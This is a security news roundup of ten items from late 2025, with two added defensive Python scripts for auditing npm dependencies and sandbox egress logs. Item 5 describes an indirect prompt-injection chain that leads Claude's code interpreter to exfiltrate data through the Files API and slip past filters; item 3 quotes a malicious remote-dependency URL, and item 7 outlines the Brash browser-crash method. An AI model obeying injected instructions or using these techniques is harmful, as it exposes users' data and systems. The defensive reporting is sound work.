This week's news made me think that maybe in our vendor review policies we shouldn't only be happy when a company has chosen to have a nice bug bounty on HackerOne or elsewhere, but we should also pay a bit of attention to the policy that bounty program has and whether things that we would consider serious violations would get accepted or rejected in the program. I am not sure Anthropic's program would pass my review today. Read item 5 to understand why.

1. UNC6384 Exploits Unpatched Windows LNK Flaw to Deploy PlugX Against European Diplomats

Between September and October 2025, the China-affiliated group UNC6384 sent spear-phishing emails to European diplomatic and government entities, exploiting the unpatched Windows shortcut vulnerability CVE-2025-9491/ZDI-CAN-25373. Malicious LNK files triggered a multi-stage chain—using a decoy PDF, PowerShell scripts, DLL side-loading of a Canon utility, and an encrypted PlugX payload to establish persistent remote access. 

Key Details

  • Targets: diplomatic organizations in Hungary, Belgium, Italy, the Netherlands; government agencies in Serbia.
  • Attack chain: spear-phishing URL → LNK file → PowerShell unpacks TAR (Canon utility + malicious DLL + encrypted PlugX).
  • PlugX RAT capabilities: command execution, keylogging, file transfer, persistence via registry Run keys.

Next Steps

  • Block or disable .LNK file execution in Windows Explorer via Group Policy.
  • Deploy application control to restrict PowerShell scripts on endpoints.
  • Scan for Canon printer utilities (e.g., cnmpaui.exe) and CanonStager DLLs in endpoint logs.

Read more at The Hacker News


2. US Telecom Company Ribbon Communications Reveals Year-Long Nation-State Breach

Ribbon Communications disclosed that suspected nation-state hackers infiltrated its network as early as December 2024, remaining undetected until September 2025. There is no evidence of material data exfiltration.

Key Details

  • Initial access may date back to December 2024; discovery occurred in early September 2025.
  • Attackers reportedly accessed customer files on two laptops; three smaller customers notified.
  • No evidence yet of material data theft; investigation involves federal law enforcement and third-party experts.
  • Ribbon’s technology underpins major carriers (Verizon, CenturyLink, BT) and critical infrastructure (U.S. DoD).

Read more at Dark Reading


3. PhantomRaven Campaign Uses Invisible Remote Dependencies to Harvest Developer Credentials

Security researchers uncovered a supply chain campaign named PhantomRaven that has embedded Remote Dynamic Dependencies into 126 npm packages since August 2025, amassing over 86,000 downloads and exfiltrating developer tokens and CI/CD secrets. The hidden HTTP-based dependencies evade static scanning, posing significant risk to development environments and CI pipelines.

Key Details

  • 126 malicious packages with zero declared dependencies fetched external payloads
  • Over 86,000 downloads between August and October 2025
  • Regular dependencies look something like this in the package.json file:
        "dependencies": {
            "express": "^4.18.0"
        }
  • But npm also supports something most developers never use – HTTP URLs as dependency specifiers that bypass registry and scanner visibility. When you install a package with this kind of dependency, npm fetches it from that external URL. Not from npmjs.com. From wherever the attacker wants. [Koi Security Blog]
        "dependencies": {
            "ui-styles-pkg": "http://packages.storeartifact.com/npm/unused-imports"
        }
  • Campaign leveraged AI “slopsquatting” to propose plausible fake package names

Next Steps

  • Audit package.json for HTTP URL dependencies
  • Monitor outbound calls during npm install processes
  • Enforce policies to block non-registry dependency URLs
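A small audit script for the first next step, added here as an illustration and not code from Koi Security or the article: it walks every dependency field of a package.json and flags specifiers that make npm fetch from somewhere other than the registry (HTTP URLs as in PhantomRaven, but also git URLs, hosted-git shorthands and local paths). The sample manifest is constructed; the ui-styles-pkg line copies the shape quoted above.

```python
import json
import re

# The manifest fields npm resolves at install time.
DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies", "peerDependencies")

# Specifier shapes that make npm fetch from somewhere other than the configured
# registry; they are checked in order and the first match wins.
NON_REGISTRY_SPECS = (
    ("http url", re.compile(r"^https?://")),
    ("git url", re.compile(r"^(git\+|git://|ssh://)")),
    ("hosted git shorthand", re.compile(r"^(github|gitlab|bitbucket|gist):")),
    ("local path", re.compile(r"^(file:|link:|\.{0,2}/)")),
    ("github shorthand", re.compile(r"^[\w.-]+/[\w.-]+(#.*)?$")),
)

def classify_spec(spec: str) -> str:
    """Return 'registry' for a normal semver/tag/alias spec, else a label for the source."""
    for label, pattern in NON_REGISTRY_SPECS:
        if pattern.match(spec):
            return label
    return "registry"

def audit_package_json(text: str) -> list:
    """Return (field, name, spec, label) for every dependency not served by the registry."""
    manifest = json.loads(text)
    findings = []
    for field in DEP_FIELDS:
        for name, spec in manifest.get(field, {}).items():
            label = classify_spec(spec)
            if label != "registry":
                findings.append((field, name, spec, label))
    return findings

# Constructed sample manifest (not from any real project); the ui-styles-pkg
# entry mirrors the remote-dependency shape quoted in the article.
SAMPLE_MANIFEST = """{
  "name": "demo-app",
  "dependencies": {
    "express": "^4.18.0",
    "ui-styles-pkg": "http://packages.storeartifact.com/npm/unused-imports",
    "helper-lib": "git+https://example.invalid/helper-lib.git"
  },
  "devDependencies": {
    "local-tool": "file:../local-tool",
    "fancy-fork": "some-user/some-repo#main"
  }
}"""

if __name__ == "__main__":
    for field, name, spec, label in audit_package_json(SAMPLE_MANIFEST):
        print(f"{field}: {name} -> {spec} [{label}]")
```

Run it against each package.json in a repository (and against the lockfile's resolved URLs, which the script does not read) before the install step in CI.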

Read more at Koi Security Blog, Cybersecurity News


4. OpenAI launches Aardvark GPT-5 agent for automated code vulnerability discovery and patching

Aardvark embeds into CI/CD pipelines to continuously scan code with GPT-5 reasoning, validate exploitability in sandboxes, and propose Codex-generated patches for human review.  

Key Details

  • Private beta since late October, deployed internally and with alpha partners
  • Achieved 92% recall on known and synthetic vulnerabilities in benchmark tests
  • Has surfaced 10 CVEs in open-source projects; pro-bono scanning for select noncommercial repos
  • Builds contextual threat models, runs sandbox exploits, then uses Codex to draft fixes

Read more at OpenAI, The Hacker News


5. Vulnerability in Claude AI Code Interpreter Allows Silent Enterprise Data Exfiltration

A flaw in Anthropic’s Claude AI lets attackers use indirect prompt injection to exfiltrate enterprise data by uploading files through the platform’s own API infrastructure using attacker-controlled keys. Default network restrictions ("Package managers only") fail to block this channel, leaving sensitive chat logs, documents, and integrated service data at risk without obvious indicators.

Key Details

  • Attack chain: Insert malicious instructions into something the LLM is reading → use the Anthropic Files API, which can't be disabled, to exfiltrate data to the attacker's Anthropic account.
  • Exfiltration volume: up to 30 MB per file, unlimited files via Anthropic’s Files API.
  • Attack leverages default egress to api.anthropic.com, allowed alongside npm and PyPI.
  • Bypasses safety filters by embedding benign code (e.g., print statements) alongside payloads.
  • Entry points include user-uploaded docs, websites for summarization, MCP servers, and Google Drive.
  • Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025. The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.

Next Steps

  • Enforce custom allow-lists excluding api.anthropic.com and monitor file-upload API calls.
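To make the next step concrete, here is an added example (not from CSO Online, Rehberger or Anthropic) that replays a constructed sandbox egress log against the default "Package managers only" profile and against a custom allow-list without api.anthropic.com. The log format, the allow-list hosts and the /v1/files upload path are assumptions; the point it shows is that the default profile denies nothing, so the only signal is upload volume to the Files API, whereas the custom list blocks the channel outright.

```python
import re
from collections import defaultdict

# Constructed proxy/egress log (not from the article), one request per line:
# timestamp session method host path request_body_bytes
SAMPLE_EGRESS_LOG = """\
2025-10-25T10:00:01Z sess-a GET registry.npmjs.org /express/-/express-4.18.0.tgz 0
2025-10-25T10:00:03Z sess-a GET pypi.org /simple/requests/ 0
2025-10-25T10:00:09Z sess-a POST api.anthropic.com /v1/files 31457280
2025-10-25T10:00:12Z sess-a POST api.anthropic.com /v1/files 29000000
2025-10-25T10:00:15Z sess-b POST api.anthropic.com /v1/messages 2048
2025-10-25T10:00:20Z sess-b GET files.pythonhosted.org /packages/example.whl 0
"""

# Hosts reachable under the default "Package managers only" profile as the
# article describes it: npm, PyPI and api.anthropic.com itself (assumed host set).
DEFAULT_ALLOWLIST = frozenset({
    "registry.npmjs.org", "pypi.org", "files.pythonhosted.org", "api.anthropic.com",
})
# The custom allow-list the Next Steps recommend: the same hosts minus api.anthropic.com.
HARDENED_ALLOWLIST = DEFAULT_ALLOWLIST - {"api.anthropic.com"}

UPLOAD_PATH = "/v1/files"  # assumed path of the Files API upload endpoint
LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST|PUT) (\S+) (\S+) (\d+)$")

def parse_log(text: str):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, session, method, host, path, size = m.groups()
            yield {"ts": ts, "session": session, "method": method,
                   "host": host, "path": path, "bytes": int(size)}

def analyse_egress(text: str, allowlist, alert_bytes: int = 1024 * 1024):
    """Return (denied, alerts): requests a proxy enforcing `allowlist` would block,
    and sessions whose cumulative upload volume to the Files API reaches alert_bytes."""
    denied = []
    uploaded = defaultdict(int)
    for rec in parse_log(text):
        if rec["host"] not in allowlist:
            denied.append((rec["session"], rec["host"], rec["path"]))
            continue
        if rec["method"] == "POST" and rec["path"].startswith(UPLOAD_PATH):
            uploaded[rec["session"]] += rec["bytes"]
    alerts = {s: b for s, b in uploaded.items() if b >= alert_bytes}
    return denied, alerts

if __name__ == "__main__":
    for name, allowlist in (("default", DEFAULT_ALLOWLIST), ("hardened", HARDENED_ALLOWLIST)):
        denied, alerts = analyse_egress(SAMPLE_EGRESS_LOG, allowlist)
        print(f"{name}: {len(denied)} denied, upload alerts: {dict(alerts)}")
```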

Read more at CSO Online


6. Atroposia RAT-as-a-Service Lowers Barrier for Enterprise Attacks for just $200/month

Researchers at Varonis have identified a new malware-as-a-service toolkit, dubbed Atroposia, that for $200 per month offers remote access, stealthy shadow RDP sessions, credential theft, DNS hijacking and an integrated vulnerability scanner. By automating reconnaissance, persistence and exfiltration in a single, low-skill platform, Atroposia compresses the traditional attack chain and significantly raises the stakes for enterprise defenders.

Key Details

  • Subscription pricing starts at $200/month, $900 for six months.
  • HRDP Connect module spawns invisible remote desktop sessions.
  • Built-in scanner reports missing patches, unsafe settings and outdated software.
  • Encrypted C2 channels, UAC bypass persistence and clipboard monitoring.

Read more at CSO Online, Varonis


7. Brash Exploit Crashes Chromium-Based Browsers via Unbounded document.title Updates

A critical flaw in Chromium’s Blink engine lets attackers crash Chrome, Edge, Brave and other Chromium browsers in 15–60 seconds by flooding document.title updates.

This makes it trivial to launch widespread denial-of-service attacks against everyday web users, but also presents serious risks to businesses that rely on web-based dashboards and headless browsers.

For example, a single malicious link could silently crash a fleet of headless Chrome instances used by AI agents for market research, bring down a surgeon’s browser-based navigation system mid-procedure, or paralyze online trading desks at the opening bell.

Because the exploit can be delayed or scheduled, attackers could time it to coincide with high-stakes events—such as peak e-commerce transactions or financial market openings—multiplying the potential damage.

Key Details

  • Affects all Chromium versions on Windows, macOS, Linux and Android.
  • Exploit phases: pre-generate 512-char hex seeds, inject bursts (≈24 million title updates/sec), saturate UI thread.
  • Immune: Firefox, Safari (WebKit/Gecko engines) and all iOS browsers (WebKit-mandated).

Read more at The Hacker News, CSO Online, Cybersecurity News


8. 500 GB of Great Firewall Infrastructure Data Exposed in Historic Breach

In September 2025, over 500 GB of internal documentation from China’s Great Firewall was leaked, revealing source code, configuration files, traffic logs, and packet captures that outline the censorship system’s architecture and enforcement rules. Embedded metadata links files to individual operators and network components, offering researchers and threat actors a detailed blueprint to identify vulnerabilities and develop evasion techniques.

Key Details

  • Leak contains 100,000+ files: source code, runbooks, Visio diagrams, PCAPs.
  • Cross-border traffic logs reveal policy propagation delays and unfiltered sessions.
  • Metadata exposes usernames, hosts, revision histories tied to telco and government teams.
  • Includes VPN IP lists, DNS query patterns, and SSL certificate fingerprints.

Read more at Cybersecurity News


9. Swedish Power Grid Operator Confirms Data Breach, Everest Ransomware Gang Claims 280 GB Theft

Svenska kraftnät has confirmed unauthorized access to a “limited external file transfer solution” after the Everest ransomware gang claimed to have exfiltrated roughly 280 GB of internal data. The breach did not disrupt Sweden’s power supply, but sensitive schematics and employee information may be at risk. The operator is working with police and national cybersecurity authorities to assess exposure and contain the incident.

Key Details

  • The incident was first disclosed on October 26, 2025, via Svenska kraftnät’s press release.
  • Everest posted on its leak site claiming responsibility and threatened to publish data if demands aren’t met.
  • Operational technology and the national electricity transmission network remain unaffected.

Read more at Svenska kraftnät, Everest Ransom_DB on X, The Record


10. Aembit Introduces Identity and Access Management for Agentic AI

Aembit has extended its Workload IAM platform with Blended Identity and an MCP Identity Gateway to assign unique, cryptographically verified identities to autonomous AI agents, enforce least-privilege access at runtime, and record every access decision. This addresses the lack of tailored access controls for self-driven AI in hybrid environments, enabling security teams to maintain auditability, revoke permissions immediately, and close the gap between AI adoption and secure governance.

Key Details

  • Blended Identity ties each AI agent’s actions to a verified human context for traceable operations.
  • MCP Identity Gateway uses the Model Context Protocol to authenticate agents and enforce policies in real time.
  • Ephemeral credentials are issued just in time, with full structured event logging for compliance.
  • Supports cloud, on-premises, and SaaS environments under a centralized policy control plane.

Read more at CSO Online, HackRead

